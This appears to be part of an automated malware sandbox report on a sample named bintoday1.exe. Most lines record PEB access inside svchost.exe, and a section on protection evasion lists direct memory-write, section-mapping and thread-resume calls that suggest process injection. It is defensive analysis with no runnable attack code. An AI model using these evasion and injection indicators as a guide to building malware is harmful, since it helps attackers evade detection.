Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h] 2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h] 2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h] 2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h] 2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h] 2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h] 2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h] 2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h] 2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h] 2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h] 2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h] 2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h] 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h] 2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h] 2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h] 2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h] 2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h] 2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h] 2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h] 2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h] 2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h] 2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h] 2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h] 2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h] 2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h] 2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h] 2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h] 2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h] 2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h] 2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h] 2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h] 2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h] 2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h] 2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h] 2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h] 2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h] 2_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h] 2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h] 2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h] 2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h] 2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h] 2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h] 2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h] 2_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h] 2_2_030BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0305E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_030FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h] 2_2_030E6F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h] 2_2_03032F12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h] 2_2_0306CF1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h] 2_2_0305EF28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h] 2_2_030B4F40
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00BF0B62
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BC2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BC2622
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BB083F
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB09D5 SetUnhandledExceptionFilter, 0_2_00BB09D5
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BB0C21

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
